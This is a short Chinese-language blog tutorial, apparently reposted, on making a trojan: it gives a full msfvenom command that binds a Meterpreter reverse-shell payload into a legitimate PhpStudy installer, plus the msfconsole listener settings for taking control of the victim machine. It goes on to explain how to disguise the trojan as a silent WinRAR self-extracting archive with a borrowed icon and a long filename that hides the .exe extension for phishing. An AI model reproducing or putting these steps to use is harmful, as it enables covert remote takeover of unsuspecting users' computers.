本文轉自行云博客https://www.xy586.top
文章目錄
- 捆綁木馬
- RAR自動解壓
捆綁木馬
使用msfvenom制作木馬程式:
#生成木馬檔案
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.138 -f exe -x /root/PhpStudy2018.exe -o /root/phpstudy.exe
將木馬檔案放入靶機中
#設定監聽反彈
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.232.138
set lport 4444
run
將木馬程式點擊執行,監聽埠得到回應,成功控制電腦
輸入shell,徹底控制電腦
RAR自動解壓
設定自動解壓運行
設定rar自動解壓格式讓它在解壓時運行惡意程式
模擬文本檔案釣魚
改良木馬程式:
偽裝:將網頁代碼和app進行系結,然后壓縮,使用WinRAR創建自解壓格式
點擊高級,在自解壓選項中的常規中添加解壓路徑,
設定程式選項卡中填寫解壓前后運行的程式,
模式選項卡中靜默模式選擇全部隱藏
使用BeCyIconGrabber.exe軟體提取出我們想要的軟體圖片ico
文本和圖示選項中,選擇加載我們剛剛生成的icon圖示
生成了我們偽裝過后的木馬程式
同時可以將檔案名稱改成比較長的名字,在不選中檔案的時候,檔案名后面部分會被隱藏,達到隱藏后綴名的效果
轉載請註明出處,本文鏈接:https://www.uj5u.com/qianduan/37336.html
標籤:其他
上一篇:LeetCode 第 206 場周賽(733/4491,前16.3%)
下一篇:五大分布式事務,你了解多少?